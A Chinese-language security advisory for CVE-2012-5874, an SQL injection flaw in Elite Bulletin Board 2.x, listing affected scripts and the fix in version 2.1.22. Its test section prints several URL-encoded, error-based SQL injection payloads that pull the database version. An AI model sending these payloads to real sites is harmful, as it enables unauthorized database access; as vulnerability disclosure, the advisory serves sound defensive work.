发布日期:2012-12-19
更新日期:2012-12-21
受影响系统:
Elite Bulletin Board Elite Bulletin Board 2.x
Elite Bulletin Board Elite Bulletin Board 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57000
CVE(CAN) ID: CVE-2012-5874
Elite Bulletin Board是电子公告版软件。
Elite Bulletin 2.1.21及其他版本"/includes/user_function.php"内的"update_whosonline_reg()"和"update_whosonline_guest()"函数没有效过滤URI数据,远程攻击者可以发送特制的HTTP请求到下列脚本,并在应用的数据库内执行任意SQL命令:
- checkuser.php
- groups.php
- index.php
- login.php
- quicklogin.php
- register.php
- Search.php
- viewboard.php
- viewtopic.php
<*来源:High-Tech Bridge Security Research Lab
链接:https://www.htbridge.com/advisory/HTB23133
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
%27,%28%28select*from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/
%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_const %28version%28%29,1%29%29a%29%29%29%20--%20/
%27,%28%28select*from%28selec t%20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/
%27,%28%28select*from%28select %20name_const%28version%28%29,1%29,name_const% 28version%28%29,1%29%29a%29%29%29%20--%20/
%27,%28%28select*from%28s elect%20name_const%28version%28%29,1%29,name_c onst%28version%28%29,1%29%29a%29%29%29%20--%20/
%27,%28%28select*from% 28select%20name_const%28version%28%29,1%29,name_con st%28version%28%29,1%29%29a%29%29%29%20--%20/
%27,%28%28select*from%2 8select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2
%27,%28%28select *from%28select%20name_const%28version%28%29,1%29,name_co nst%28version%28%29,1%29%29a%29%29%29%20--%20/?bid=2&amp;tid=1
建议:
--------------------------------------------------------------------------------
厂商补丁:
Elite Bulletin Board
--------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载v2.1.22:
%20Bulletin%20Board%20v2/2.1.22/